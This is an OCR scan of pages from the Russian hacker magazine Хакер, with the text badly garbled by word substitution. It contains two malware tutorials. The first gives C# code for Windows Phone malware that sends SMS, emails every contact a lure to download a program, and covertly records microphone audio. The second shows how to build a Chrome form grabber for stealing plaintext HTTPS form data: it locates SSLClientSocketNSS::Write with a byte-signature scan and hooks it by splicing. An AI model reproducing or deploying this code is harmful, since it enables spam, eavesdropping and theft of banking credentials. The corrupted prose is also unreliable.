БЕЗОПАСНОСТЬ Посмотрим , что такое?

Microsoft сделала пользу кого безоnас ­

0.

стае имен

кайфовый й не без; истеме смартфона . IКазало не без; ь бы , э в таком случае

дай тебе нетрудно запоминать информация .

В сделал ь шифр уnравляемый !выnолняет со автор этих строк nод

ограничивает наши возможн что до не без; т да , н о, когда

поварить котелком , то и дело л равным образом тебе nр их одится

ч е го следует, ч ведь !nо­

коnаться на содер ж да м в рассуждении м своего т е л е фона?

К тому ж е безоnасн ос ть- nр язва д е на се го . !

вр е д систе м е .

Ка ж дое nрилож е ни е выnолняется во своем

nространстве- ко а м ере

0.

Пользователю заnр е щен перед из туn ко фа й ло­

.NET Compactl , с

те нциально! ни для ак в рассуждении е ПО отнюдь не может намыть

0.

SmsComposeTa sk msgSMS=пеw SmsComposeTask(); msgSMS. Body="Наше зло-сообщение" ;

WINDOWS PHONE

ности своей мобильной ОС .

0.

0. 6.

оторванно с дру г равно х nриложений , таким образом , для ни м ни для в таком случае неграмотный имеет вплоть до не без; т у nа, к роме самого nрил ож ения.

03/158/2012

Приложения позволяется у вместе с танавливать только из

ichamberl .

Ка ж дое nрилож е ни е х ранит вместе с вои факты

ХАКЕР

Oп N a vigatedTo(N avi g a tioпE ve пtArgs е)

Windows

Рhопе

Marketplace . SSL . Впроч е м ,

Данные nередают не без; автор вследствие

было бы вот так фунт , е сл равным образом бы было инач е.

0.

Разработчик м по части но т проэксплуатировать для лас не без;

ProtectedData

lна х одящи й ся во nростран -

System .Security.Cryptograph yl,

0. WP 0 nоддерживаетсл е дующие алго­ ритмы шифрования : АЕS, HMACSHA1 , HMACSHA256, Rfc2898DeriveByte s, RSA, SHA1, SHA256 . 9. Встроенный браузер, мобильны й IE , н е nо­ зволяет устанавливатьдоnолнительные nлагины .

00. Приложения,

разработанные невыгодный на

Microsoft,

невыгодный м огутфун для циониров а ть во фоново м р ежонок равно м е .

083


MALWARE msgSMS.To=""1928"" ; msgSMS. Show();

}

СПОСОБЫХРАНЕНИЯ

П оследняя коман несомненно листинга формирует равно отправляет сообщение; остальной шифр на комме нтария х отнюдь не нуждается.

МОБИЛЬНЫЙ СПАМ- ЗЛОБОДНЕВНАЯ ТЕМА : ]

Windows Phone nредоставляет nриложениям три способа раздельного хранения информации:

0.

Следующая оборона га , которую наш брат напишем, достаточно считыва ть имейлы

Изолированное депо в целях настроекзаnоминаеттекущее

средства nриложения nри nереходе изо одного режима его работы

на второй (исnользуется hаsh-таблица : параметр=значение) .

с списка контактов владельца смартфона да распространять сверху них <щен­

н ую» информацию:). В различие ото предыдущей версии мобильной

0. Изолированное пинакотека с целью файлов равным образом nапок.

оси, во WP 0.5 контактные способности хранятс моя персона на удобочитаемом на иде

З.

Локальная БД интересах реляционных данных служит пользу кого хране­

на локально й БД . К ним относятся безграмотный только лишь заезжий дом телефонов

ния множества придирчиво уnорядоченных свойств приложения ,

равным образом адреса электронной почты , только равным образом др уг ая рэнкинг в рассуждении контактах,

ко которым вnоследствии позволительно перекинуться со nомощью заnроса

забитая пользователем , таково который эа ним не возбраняется хорэ уже равно по­

нате LINQ, чтоб взять и/или преображать сведения .

шпионить. Эта БД предназначена токмо ради чтения , благодаря тому тебе не удастся модифицирова ть показатели другими словами прикинуть новоявленный контакт.

Пора приниматься разработку. Создай новоизобретённый WР-проект (об рати внимание , зачем операционная налаженность имеет версию 0.5, а SDK-

Таким образом, у разработчика имеется в наличии уместительный ассортимент средств для того хранения данных , вопреки возьми безденежье достуnа

ко файловой системе устройства.

версию 0.1) бери основе Silveгlight , перейди на обложка С#-кода да добавь в почин ссылку возьми область имен Micгosoft.Phone.UseгData, обесnечивающее работу со пользовательскими данными. Не забудь также наболтать указанное во прошлом разделе nространство имен

хотя довольно возвращен во переменной класса CoпtactsSeaгchEve ntAгgs .,

к работы вместе с мылом. Второе, что такое? следует сделать, - сие анонсировать

так вернется возлюбленный только лишь на событии SeaгchCompleted, переработчик

глобальную переменную класса Contacts, с целью владеть проход

которого необходимо зарегистрировать во функции MainPage:

для контактным данным юэера. Для инициализации nоиска наш брат вы­

зываем изо функции MainPage функцию ln itSeaгch, которая во строчке

contacts.SeaгchAsync(Stгing. Empt y, FilteгKi nd. DisplayName, null)

contacts.SearchCompleted +=new EventHandler< ContactsSearchEventArgs >(contacts_SearchCompleted)

производит неодновременный разглядывание по мнению контактным данным . У функции

SeaгchAsync три ровня метра: требование поиска (если оный параметр

Теперь опишем сие событие:

пустой, в таком случае ищется всё); брат метр, согласно которому проводится выбор-

ка ( не грех сыскивать соответственно имени, имейлу, пункт у телефону или — или просто указать None, ежели параметр безграмотный важен, по образу на нашем случае); объект, в который-нибудь помещается последствие поиска, другими словами nul l. Р езульта т всё рав-

void contacts_SearchCompleted(object sender, ContactsSearchEventArgs е) { int max=e.Results.Count(); // для ол-во конта ктов string adr; try { // вот уклонение падения nроги for ( int i=е ; i < max; i++) i f (e.Results.ElementAt(i).EmailAddresses !=null) { adr=e.Results.ElementAt(i). EmailAddresses.First() . EmailAddress ; // берем мыло i f (adr !=_ null && adr !="" ) 01 буде оно никак не в равной степени нулю SendEmail(adr); // шелом мь~о : )

catch (Exception

ех)

{ }

} Из заключение видно, что-нибудь первоначально наш брат берем точка соприкосновения величина найденны х контакто в, спустя время во цикле выбираем основной e-mail-aдpec каждого кон­

такта (у него может бытийствовать невыгодный одно мыло) и, буде текущий надсыл безграмотный nустой , вызываем функцию SendEmail, которой п ередаем открытый адрес. Это беда простая функция:

void SendEmail(String adr) { EmailCompos!;Task email=new EmailComposeTask()_; email . То_=adr; email. Subject=" Holy mail" ; email. Bqdy="Down_load my prog" ; email. Show(); } Как всякий раз , до мельчайших подробностей прокомментированный распечатка ищи получи ди ске

(проект EmaiiSeпder). Интерфейс Overhear2

ХАКЕР

03/158/ 0012


Малварь чтобы мобильных <<око шек »

ПОДСЛУШИВАТЕЛЬ

ларингофон относится для пространству имен

В прошлом разделе у нас вместе с тобой был воздушный расела бон, следственно

xna,

симпатия управляется со­

бытийным механизмом сего цикла:

ну-кась напишем что-нибудь согласно еложнее да поинтереснее. Как необходимо

с заголовка раздела, следующая наша малварь довольно развесить уши равно со­ хранять постоянно улавливаемые смартфоном звуки. Для ясности в нескольких словах

DispatcherTimer dt ; new DispatcherTimer(); dt.Interval ; TimeSpan . FromМilliseconds( ЗЗ );

расскажу об алгоритме ее работы, по образу пишущий эти строки его вижу. Волга зумеется, наша сестра

пишем таковой сравнение чрезвычайно на исследовательских целя х!;]

Чтобы вмещать реальность делать эпизод таймера, про­

После запуска· наше приложениена порядочно секунд заключает

исходящее чрез организованный расстояние времени, подписываемся

емкость равным образом записывает окружающие звуки на поток, по прошествии времени выключа­

нате событие: dt.Тick

ет остеофон равно записывает армия во обложка во изолированном хранили ­

команды dt.Staгtll запускаем таймер.

ще смартфона, задним числом чего, наконец, загружает с сего хранилища

+; new EventHandler(dt_Тick). Затем от через

Второй регулятор выдержки времени нужен пользу кого того, ради изъять микрофон,

обложка равным образом воспроизводит его. Результат да мы вместе с тобой узнаём только лишь за

поберечь рой на файле равным образом повторить его. Таким образом, про

исполнения последовательности всех сих действий , следственно исключая

инициализациивременного интервалатаймера нужендлительный

малвари моя особа приготовил интересах тебя вставка (Оvегhеаг2 , ищи держи дис­ ке], на котором каждая отдельная бизнес выполняется соответственно нажатию

период (например,

кнопки, с намерением твоя милость был в силах подробней осматривать всё-таки сии операции.

конструктора инициализируем микрофон, вызывая самсписную

Если хочешь разбудить чтение с со мной вместе с нуля, сгенерируй

новейший Silveгlight- редакция чтобы

WP.

00 000 мс], nлюс полагается задатьдругую функцию

на качестве обработчика события, всё остальное ведь но самое. В конце

Пер ейди во зачаток файла С#- заключение

функцию SetupMicгophone. Сначала симпатия проверяет, с целью дефолтны й

стакан безвыгодный был равен нулю. Если сие в области каким-то причинам никак не так,

равно подключи следующие пространства имен:

т~делатьнечег~выхо партия .

using using using using using

способ расшифровывать аудио продолжительностью полсекунды.

Затем устанавливаем аудиобуфер микрофона, дабы извлечь

System.IO; Microsoft.Xna.Framework; Microsoft.Xna.Framework.Audio; System.Windows.Threading; System.IO.IsolatedStorage;

Заполняем нулями публикующий впереди поток. После сего регистри­ руем событие, возникающее близ заполнении буфера. Вызов функ­ ции WгiteWavHeadeг рассмотрим порядочно позже, в эту пору спирт для того нас

неграмотный чересчур важен . Наконец, от через строчки micгophone.Staгtll включаем ларингофон сверху писание окружающих звуков. В последней

В первом с них находятся классы для того работы со потоками равным образом фай­

лами, закачаешься втором- FгamewoгkDispatcheг (если коротко, обработ­

строчке функции устанавливаем эшелон громкости . Настала кортеж перипетии первого таймера , которое вызывается

чик циклических событий], во третьем, собственно, самолично микрофон,

каждые

на четвертом -таймер чтобы генерации циклических событий (ниже

близ этом целое происходящие исключения игнорируются. С момен-

03

миллисекунды . В нем токмо обновляе тся состояние,

рассмотрим, пользу кого в чем дело? симпатия нужен], а во пят ом - капитал интересах работы

та запуска программы равно давно тех пор, ноне пусть будет так запись, аргумент

вместе с изолированным хранилищем. Дале е на машинально сгенери­

гecoгdingStopped имеет нулевое значение. Когда истечет временной

рованном классе MaiпPage объявим глобальные переменные iсм.

промежуток второго таймера равно его происшествие короче сгенерировано, каста

исходник]. П ервая безвыгодный представляет особого интереса, на ней прямо-таки

аргумент примет истинное значение. При заполнении аудиобуфера

содержится фамилия файла пользу кого сохранения полученного звука равно его по­

микрофона (это происходит будто каждые 000 миллисекунд] вы­

следующего считывания. Во второстепенный переменной объявляем микро­

зывается происшествие micгophone_BuffeгReady.

фон, которому зараз а присваиваем вес <<ПО умолчанию» во сегодняшнее промежуток времени целое смартфоны от ОС

Windows Phone только одним микрофоном, вследствие чего одно изо двух мало значит :].

оснащаются

В нем документация извлекаются изо аудиобуфера микрофона равным образом записы­ ваются во поток. Е сли около этом аргумент гecoгdingStopped принима­ ет истинное значение, значит, учет завершена, равным образом нам должен

Затем объявляем переменную , ко которой nривязывается nоток. В этом потоке сохраняются аудиоданные на процесс сеанса

изъять стакан да поддержать сель данных на файле. Возможно, твоя милость задалея вопросом: вследствие чего автор неграмотный выключаем микро­

заnиси, предварительно сбросом на хранили ще . Массив байтов (следующая

окружение из первых рук быть генерации перипетии второго таймера, а от­

переменная] используется пользу кого пром ежуточного хранения данных.

кладываем вырубание прежде следующего заполнения титьки данных?

Когда вн утре нний задница микрофона заполняется, материал изо него

Это нужно к того, в надежде данные, имеющиеся во буфере для моменту

скидываются на таковой массив, равно всего только а там записываются на вдоволь

возбуждения действие тика таймера, были сохранены . Если бы наша сестра

стремнина . Булевекая аргумент гecoгdingStopped указывает действие,

одновременно выключили микрофон, ведь данные, находящиеся на его буфере,

выполняемое во известный момент, ведь есть, когда симпатия равна нулю, подходит

были бы уничтожены.

заnись (если остеофон до этих пор включен], на nротивном случае осущест­

Функция SaveFilei] (см. листинг], вызываемая в целях сохранения фай­ ла, без труда создает обложка на изолированном кладовая равно записывает

вляется воспроизведение.

В конструкторе класса объявим двоечка таймера класса

во него огулом много от основания да перед конца.

DispatcheгTimeг знак инициализируем их временные значения .

Первый регулятор выдержки времени нужен пользу кого имитации игрового цикла

xna.

Так во вкусе

private void SaveFile() {

/ /сох оцарапать обложка

ЖИЗНЕННЫЙ ЦИКЛ ПРИЛОЖЕНИЯ В всякий пространство времени может проделываться

сверху другое, на певом месте переводится во бездеятельный производительность

во ход жизненного цикла приложения не без; ним

одно приложение, да сие жуть важно- звезда во том,

ldoгmaпt), только его текущее структура сохраняется,

происходит через двух прежде четырех событий: дело

почто сие дополнение lтеоретически) неграмотный сможет

с намерением близ последующем запуске добавление

Lauпchiпg во миг запуска, Closiпg на мгновение

на фоне послать эсэмэску возьми небесплатный штучка тож

возобновило работу. Процесс захоронения

закрытия,

произвести остальные злодеяния. Этотход позволяет

приложений

захоронении) равно Activating около восстановлении

добиваться наилучшей производительности, равным образом

tombstoniпg. Если работающему приложению

изо

безграмотный истрачивать фугас батареи нате фоновые задачи. Когда

безграмотный до черта ресурсов, ведь ОС завершает (teгmiпate)

производится прибережение равно возмещение

читатель переключается от одного приложения

спящие приложения на порядке их запуска. В общем,

состояния приложений, позволено приготовлять .

ХАКЕР

03/158/ 0012

(active -> doгmaпt) получил номинация

Deactivating близ деактивации (при

tombstone. Все сии события, во которых по большей части

085


MALWARE using (IsolatedStorageFile isoStorage= IsolatedStorageFile . GetUserStoreForApplication()) { using (IsolatedStorageFileStream isoStream ~ isoStorage.CreateFile(FileName)) { isoStream . Write(stream . ToArray(), е, stream.ToArray().Length);

Однако кабы не утратить наводнение на таком виде, во каком некто в ту же минуту есть,

ведь его далеко не откроет ни одна список в целях воспроизведения . Чтобы привести мозгло й рой данны х ко понятному на иду, надо добавить заголовок . Таким образом, у нас получится wаv-файл. Е сли нужно получить обложка другого типа, ведь по-над обильно данны х нужно дополни­

тельно поизвращаться

Разработка малвари

Overhear

:1. Но равным образом воеже унаследовать безыскусственный wаv -фа йл, нам

должен испытывать границы полей заголовка. В своем благе швейцар­

ский кракер Дамиан l goo.gl/ufeЗyl предлага ет замечательное решение, которое заключается на добавлении двух функций ! их код есть получи странице) . Не вижу смысла им неграмотный воспользоваться! Функцию WriteWavHeader, которая создает начальные эмпирика для заголовка, потребно родить во начале журнал lв нашем случае- во функ ­ ции SetupMicrophonel, а функцию UpdateWavHeade r, обновляющую

При использовании объекта изолированного хранилища спирт откры­ вается к чтения лишь позже проверки того, существует ли вообще файл указанного имени. Звук изо открытого файла воспроизводится с через объекта mediaSound. Воспроизведение начинается после привязки файлового потока ко данному объекту равным образом установки позиции, с которой требуется заварить кашу проигрывание, да громкости звучания.

Кроме того, дозволительно копировать армия аудиоданных лично

заголовочные данные, которые зависят ото размера записываемого

изо памяти. Для сего будет учредить конструкт звукового эффекта

потока,- во конце записи, пизда сбросом данных во обложка !то убирать

со следующими параметрами: фонетический целый короб во памяти, преобразован­

во функции microphone_BuffeгReady, затем окончания записи, же пред

ный на скопление байтов, колебание звука !есть предопределенные значения)

вызовом SaveFilel. В результате во изолированном храни лищ е короче

равным образом цифра каналов звуковых данных !м оно либо — либо стереоl. Затем не­

сохранен полновесный wаv-файл. Последне е действие, выполняемое

обходимо родить технология Play данного объекта:

на обработчике действие microphone_BufferReady !кроме обнуления переменной recordingStoppedl,- сие требование функции PlayFile для воспроизведения звука с сохраненного файла. Вот в духе выглядит эта функция:

private void PlayFile() . {. //воспроизвести сохра ненный файл using (var isf= IsolatedStorageFile.GetUserStoreForApplication()) i f (isf.FileExists(FileName)) { . using (var isoStream=isf.OpenFile(FileName, FileMode.Open, FileAccess.Read)) { mediaSound.Stop(); mediaSound.SetSource(isoStream); mediaSound.Position=System.TimeSpan.FromSeconds(e); mediaSound.Volume=20; mediaSound.Play();

sound=new SoundEffect(stream.ToArray(), microphone.SampleRate, AudioChannels.Mono); sound. Play(); Вот равно постоянно потенциал нашей товар вари! Тем неграмотный менее, имеются пла­ ны сообразно ее развитию : для примеру, потому изо ОС Windows Phone нельзя отправлять переписка от вложениями, придется потоплять файлы в какой­ нибудь сервер. Но сим наша сестра займемся во будущем!

ЗАКЛЮЧЕНИЕ В статье автор провели рецензия системы безопасности Windows Phone 0.5, рассмотрели возможные коричневато-зеленый да разработали собственную малварь.

WP- неограниченно известная система, равно на будущем симпатия будеттолько набирать аудиторию. Так наравне налаженность имеет мощные собственность ради обе­ спечения безопасности, а приложения во ней устанавливаются всего лишь

изо Marketplace Hub !где подлежат обязательной модерации), у малвари практически не имеется внутренние резервы nоnасть получи телефон. В ведь а сезон раз­ витие малвари отнюдь не стоит только получи месте, nоэтому будем напряженно надзирать

}

после дальнейшими событиями , а может быть, равным образом около м ем во них участиеl :Х:

ВЫПОЛНЕНИЕ ПРИЛОЖЕНИЙ WP 0 предоставляетвыполняемому приложе­

равно драйверы уровня ядра, следовательно,

выполняются драйвера пользовательского

нию изолированное пространство- камеру.

разработчики nрикладны х программ долж­

уровня .

Приложение, находящееся во этой камере,

ны бегать использования сего режима ,

никак не имеет доступа ко данным других приложе­

особенно когда они хотят разместить свое

дефолтный строй выполнения предуста­

ний. При этом существует цифра в виде камер:

приложениена

новленных программ , таких на правах

0. The Trusted Computing Base (ТСВ)- фундамент

потому что выполняющееся сверху этом уровне

доверенного выполнения . На этом уровне выполненияприложениеснаивысшими

086

Windows Phone Marketplace,

приложениенепройдетпроверк~

0. The Elevated Rights Chamber (ERC)- каме­

0. The Standard Rights Chamber (SRC)MS Office Explorer 0 да т. д . 4. The Least Privileged Chamber (LPC)- уро­ MoЬile, lnteгпet

вень наименьших привилегий, дефолт­

привилегиями имеет теледоступ ко во всех отношениях ресур­

ра повышенных прав . Здесь приложения

ный производительность выполнения приложений

лично смартфона, в томик числе фото- да видео­

имеют приступ ко во всех отношениях ресурсам, выключая

далеко не с

камеру, акселерометр равно иные датчики.

стратегий безопасности, так принимать ко данным ,

предоставляются всего лишь те ресурсы, кото­

В этом режиме выполняется костяк системы

устройствам равно датчикам. В этом режиме

рыезапрашиваются возле инсталляции.

Microsoft. В этой камере приложению

ХАКЕР

03 / 058/ 001 0


Preview КОДИНГ ФОРМГРАББЕРДЛЯGООGLЕСНRОМЕ

088

Перехватформ-это особенно востре­ бованнаятехнологиявтрояна~таккак именно не без; ее nомощью осуществляется

ко р ажабольшейчасти личныхданных

J

nользователей. Формграббером для lnteгnet Ехрlогег равно

Mozilla Fiгefox у а

пустынно отнюдь не удивишь-такие решения

стары равным образом общеизвестны. А вишь граббинг для

Google Сhгоmе-это своего рода

эксклюзив, со которым твоя милость сможешь разо­

браться, nрочитав эту статью. Д ело-то, как оказывается, нехитрое-нужно

только что разыскать функцию, которая на качестве одного изо nараметров nринимаетданные

сложение внезашифрованном виде равно nо­ ставить сверху нее хук.

КОДИНГ

UNIXOID

J)) И ЦЕЛОГО СИ МАЛО Приразработкехакерскихутилитчасто встречаются задачи, которые не выйдет

решитьсиламиобычногоnреnроцессора Си. В ёбаный ситуации выручит Python!

ФЕДОРИНОСЧАСТЬЕ Последние версии д истрибутива Fedoгa выделяются несколькими интересными да

дажеинновационными изменениями. Но насколько они хороши?

SYN\ACK

01

В ПОИСКЕИНСАЙДЕРА Выявить равно nредотвратить утечку кон­

фиденциальнойинформациисnособы DLР - системы. Мы решили nрове со ти не­

великоватый тест-драйвтаких решений.

ХАКЕР

03/158/201 0

01

ДОСТУЧАТЬСЯ ДО НЕБЕС Расширияемграницысоnрикосно на е н ия в е ба равно обычного Linux-дecк т o n a, объеди н яя nривычную систе м у равным образом

облач н ые сервисы.

FERRUM

01

ИСПЫТАНИЕ НАГРУЗКОЙ Какие инструменты равным образом n одходы могут nомочь Djаngо-nриложению выдержать баснословные нагрузки? Ответ возьми во­ nрос - на этом материале.

ОТ«ВИНТА>>! Го н яем цифра без ш нихжесткихдисков

на разных бе н чмарках . П ора опре д е­ лить, который с них может похвас т а ть ся

максимальным души дейс т вием.

087


КОДИНГ

Сергейка Сергеев [seseгegalagmail.гu, Ыotloгe.Ыogspot.coml

р

к

Google Chrome ИССЛЕДУЕМ ОТПРАВКУ ЗАШИФРОВАННЫХ ФОРМ И СПОСОБ ИХ ПЕРЕХВАТА В БРАУЗЕРЕ

OTGOOGLE

• qoo.qi/Cj4PI OllyDbg ради

nлaгин

создания сигнатур

равно масок .

аоо .аl/гdдlо -то

а самое, всего лишь

АЛЯ IDд .

• qoo.gl/ulqMb -интересная

хворостина получи форуме , nосвящённая

перехвату форм в Chгome .

• qoo.ql/sZWwZ относительно прологе равным образом эnилоге .

Для генерации прологов равным образом эпилогов я использовал

функцию без модификатора

_ declspec( naked), рассматривал её в дизассемблере и копировал начало и конец.

Перехват форм- сие преимущественно востребованная технология во банковских троянах, этак в качестве кого не в чем дело? иное со ее помощью осуществляется угон большей части личных

данных пользователей. Формграббером на lnteгnet

Ехрlогег равным образом

Mozilla

Fiгefox еще ни одной живой души неграмотный удивишь- такие

решения стары да общеизвестны . А вона граббинг для того

Google

Chгome- сие сей поры эксклюзив, со которым я

ныне да разберемся .

088


Формграббер д ля

Google Chrome

~~----- -~ ~~~~~~-----

~~

Рис .

0. Сигнатурн ый

Н

n по отношению претензия на

Р равным образом с.

OllyDbg

0. Поис для SSL- зa n poca

равным образом в чем дело? сложного на перехвате нет, нужно лишь только отрыть функ­

SRV*c:\code\symbols*http://msdl . microsoft.com/download/ symbols;SRV*c:\code\symbols* http://chromium- browsersymsrv.commondatastorage.googleapis.com

цию, которая на качестве одного с параметров принимает данные стать внеза ш ифрованном виде равным образом доставить

возьми нее хук. В библиотекой

IE такая функция, HttpSendRequest, экспортируется wininet .dll, во Fiгefox сие связка PR_Wгite с библи­

Здесь c:\code\symbols- папка, много складываются закачанные

отеки пspг4.dll, а наравне автор этих строк искал аналогичную функцию на Хрома, сейчас расскажу.

отладочные символы.

0.

Открыть изрядно окон изо карта View. Рекомендую обнаружить окна Commaпd, Registeгs да DisassemЬiy.

ИССЛЕДОВАНИЕ С перехватом незашифрованных форм во

Chгome несть ника­

Google

ких проблем, хватит водрузить хук нате стандартную экспорти­

0. 6. 7.

Запустить Chгome. Открыть подбор

File-7 Attach to а

Pгocess ...

Выбрать кто хочешь chгome.exe да придавить ОК.

руемую функцию WSASeпd. Сделать сие баста легко, да ма­ териала на интернете в эту тему предостаточно. П оэтому выгодно отличается

С через команды <<х chгome*!*SSLCiientSocketNSS: : Wгite>>

сконцентрироваться держи поиске функции, которая принимает эмпирика

!которую желательно инъекцировать на окне Commaпdl пишущий эти строки нашёл функцию

форм на SS L-соеди н ении до настоящий поры д что до шиф р ова н ия .

SSLC i ientSocke t NSS::Wгite, а затем равным образом SS L CiientSocketWin::Wгite. П о­

Мои п оп ы тки сыскать подобную функцию вместе с помощью закончились неудачей, отчего автор этих строк начал рыть во

Google

OllyDbg и враз

наткнулся получи и распишись страницу со полным исходным кодом браузера

ставил получай них брейки lbгeakpointsl да зашёл на родной Gmаil-аккаунт. Программа прерывалась только лишь получи функции

SSLCiientSocketNSS

::Wгite.

lgoo .gi/8SgW2 , фактически Chгome - опенсорсный проект). Висходниках позволяется покопошиться , указав на соответствующем поле фигура поиска, ась? выискивать наш брат хотим на файлах С++ . П ервый запрос, который-нибудь пришел м н е во голову,- сие

«ssl socket>>.

В процессе поиска за э т ому запросу мы одновременно наткнулся держи обложка

ssl_socket .h lgoo.gl/6cw0w l, только нуль интересного во нём неграмотный на­

О nисани е фуй нк ции,

в йден н что касается й на да со х од н ом для оде

int SSLClientSocketNSS: :Write( IOBuffer* buf, int buf_len, const CompletionCallback& cal l back

шел, зато на левой части экрана увидел брус файлов от вкусными названиями. Меня интересовало всё , в чем дело? имело во названии

·

ssl socket, а во особенности файлы ssl_clieпt_socket_nss . cc, ssl_ client_socket_openssl.cc равным образом ssl_clieпt_socket_wiп.cc. Я знал, аюшки?

передается жопа не без; РОSТ-запросом. Л огично предположить, ась?

во Fiгefox перехватывается цель PR_Wгite, да решил пошарить

на переменной из типом IOBuffeг:

да

Оставалось лишь только выяснить, каким образом этой функции

равным образом ее. В результате получай первой а изо появившихся двух страниц оказался обложка

ssl_client_socket_nss.cc.

Саму функцию моя персона во нем что-то около

равно безвыгодный нашёл, тем не менее в эту пору знал, каким ветром занесло возлюбленная вызывается.

class NET_EXPORT IOBuffer : puЫic base: :RefCountedThreadSafe<IOBuffer>

Просмотрев листинг, автор этих строк наткнулся в функцию SSLCiientSocketWin::Wгite, чем-то напоминающую PR_Wгite. В дру­

puЫic :

гих фай л ах, п еречисленных выше, в шлись аналогичные функции:

IOBuffer(); explicit IOBuffer( int buffer_size); char * data() { return data_; } protected : friend class base: :RefCountedThreadSafe<IOBuffer>; explicit IOBuffer( char * data); virtual -IOBuffer(); char * data_; };

SSLCiientSocketOpenSSL: : Wгite равно SSLCiieпtSocketWin::Wгite. Следо­ вало их проверить.

Для сего требовался настройщик да адреса функций. Я восполь­ зовался официальной инструкцией объединение настройке да отладке

Google

Chгome, которая лежит в области адресу goo.gl/fwt1S . Е сли вкратце, ведь с целью отладки Хрома нужно произвести следую­ щее:

0. 2. 3.

Запустить WinDBG . Открыть карточка

File -7 Symbol File Path.

Вставить во появившееся окошечко следующую строку:

ХАКЕР 03/158/201 0

Так на правах состав сложная да непонятно, какое на действительно-

089


КОДИНГ

EIP 0287SR4C chroNe_1.0287SR4C С 0 ES ае23 02Ьi t et FFFFFFFF! Р 0 CS eet В 02Ьi t et FFFFFFFF! ~ 0 SS е023 02Ьi t 0( FFFFFFFF!

0 0 S е

Т е о е о е

ST0 ST1

ST2

OS 0023 02Ь 0t FS е03В Э2Ьi t GS ее0е NULL

е 0FFFFFFFF 0 7FF~F000(

FFF!

емрtу

et<~Ot~ емрtу

SТЗ er>IPtY

ST4 er'loty

STS ST6 ST7

Рис.

емоtу емрtу емрtу

0. SSL-зanpoc найден

сти дрейф у данных, ми пришлось ловить указание сверху сосредоточение

Здесь-то автор сих строк равным образом будем программно выслеживать надсыл нашей неэкспорти­

символов вручную. Для сего ваш покорнейший слуга на ранее привычном

OllyDbg поставил брейк нате функцию SSLCiientSocketNSS: : Wгite lсм. падди 01, возле оста­

руемой функции.

новке взял первоначальный параметр с стека равным образом начал заливать шары во нём

сигнатурный разыскание . Сигнатурой функции !последовательностью байтов, соответственно которой склифосовский воплощаться в действительность поиск! выступят первые

отдельный DWORD iсм. цицания 01. Выяснил ось, что-нибудь беспристрастный DWORD !то принимать 00Buffeг+81 представ­ ляет на вывеску обозначение нате сосредоточение символов ichaг*l, насчитывающий

Оптимальным способом пользу кого сего на данном случае автор считаю

04

байт функции, они уникальны интересах модуля chгome.dll равно однознач­

а указывают в нашу цель.

НТТРS-запрос iсм. шала 01. Далее на процессе отладки моя персона обнаружил, почто аншлаг

POST-

зanpoca равно его документация передаются функции кореш из-за другом, во от­ дельных вызовах. Это мелочёвка nонять, когда назначить символьный

брейк-данс нате функцию SSLCiientSocketNSS::Wгite lсм. рис вызывается отправления равным образом на буфере находится пункт

01. Сначала «POST ... >>,а сле­

трескающий картель сделано заключает исходняк формы. Мы сие обязательно учтем.

ПОИСК АДРЕСА Теперь позволительно затевать для разработке, так питаться для написанию модуля , который-нибудь короче затягивать найденную перед этим функцию.

дизас1-1 начаJJЫ!РЙ .част.и

nерехватt,~ваемой функции

chrome_lcзeeee!

net: : SSLClientSoc.ketNSS: : Wri te: 02875а4с 05 push еЬр 02875a4d ВЬ.ес mov еЬр, esp 02875a4f 01 push есх. 02875а50 03 push еЬх 02875а51 06 push esi 02875а52 07 push edi 02875а5) . ff7508 push dword ptr [ еЬр+ 0 ] 02875а56 Bbfl mov esi.ecx 02875а58 ЗЗdЬ xo r еЬх,еЬх

Тут необходимо задуматься, по образу раскопать ее местожительство программно, ведь она никак не экспортируется, а значит, обычным GetPгocAddгess в этом месте

Скопируем первые байты функции равным образом преобразуем их на скопление

байтов IBYTE*I, какой-никакой связка поиска сигнатуры принимает

безграмотный быть . В процессе Хрома глотать двуха РЕ-модуля, которые потен­

на качестве параметра дружно от маской сигнатуры, хзндлом равным образом раз­

циально могут заключать нашу функцию,- сие chгome.exe

мером модуля. Маска служит пользу кого вычленения релятивных равно абсо­

равно chгome.dll. Отладчик нам куртуазно сообщает, который код

лютных адресов во сигнатуре, благодаря тому что вроде они могут переменяться рядом

SSLCiieпtSocketNSS::Wгite что разок лежит во пределах

каждом запуске. Байты адресов помечаются знаком«?,,, осталь­

dll . Что

говорить, во ней не насчет частностей находится большая доза заключение браузера.

090

ные байты- наслышан <<Х>>.

ХАКЕР

03 / 058/ 001 0


Формграббер к Google Chгome

i f (DataCompare((BYTE *)(dwAddress+ i),pbMask,szMask)) return (DWORD)( dwAddress + i ); return

е;

Кто-то может сказать, аюшки? данный манера is f*cking unstaЫe. Однако прошло полгода, вер эта Хрома н ео дн ократно менялась, а сигна т у­

ра всё ещё ра ботает.

ПЕРЕХВАТ ОК , да мы от тобой нашли а дре не без; функции, теnерь её нужно nерехватить. Для этого nодойдёт известный сnлайсинг. Д ля те х, который во танке, сnлай­ си н г- сие схема nерехвата функции, основанный сверху модификации Рис .

0. Условный брейк-данс нате SSLCiientSocketNSS::Write

ее кода. Самый nростой тип исполнить со nл айси нг- за­ менить, сперва сохранив, nервые

0 байт

nерехватывае­

мои функции сверху «JMP твоя_функция » . Д ля вызова оригина льн ой

Вызов функции пои ска осуществляется следующим образом:

функции на этом вместе с л учае нужно во осстано крутить э ти

0 байт с

бу фера ,

а позднее вызова по новой внести изменения получи JM P. У сего метода кушать будучи ­

char * Sign="\x55\xBB\xEC\x51\x53\x56\x57\xFF\x75\xeв \xBB\xFl\xЗЗ\xDB" ; // Сигнатура SSLClientSocketNSS :: Write

ственный недостаток. Дело во том, почто если бы впоследствии восстановления начальной части оригинальной функции переключится на др угой поток, ведь возлюбленный сможе т призвать функцию, кроме отечественный хук.

char * Mask="xxxxxxxxxxxxxx" ; // маска DWORD SSLAdr=FindPattern(ChromeDLL, Chrome32Size, (BYTE*)Sign, Mask); /1 SSLAdr - приветствие SSLClientSocketNSS: :Write

Есть да др угой порядок сплайсинга - не без; беспричинно называемым «т рам­

пл ином>>. Как да на предыдущем способе, на нем во начинание функции также встраивается

JMP держи хук, же для этом соответствие заканчива­

ется . Для вызова оригинальной функ ц ии присутствие т аком сплайсинге её начальная доза невыгодный изумительный сста навливается . Этот манера невыгодный об ладает указанным недостатком.

При усик тановке пере х хлопчатая бумага прямо создается буферс пр авами

Сама функционирование выглядит так:

bool DataCompare( const ВУТЕ * pData, const ВУТЕ * bMask, const char * szMask

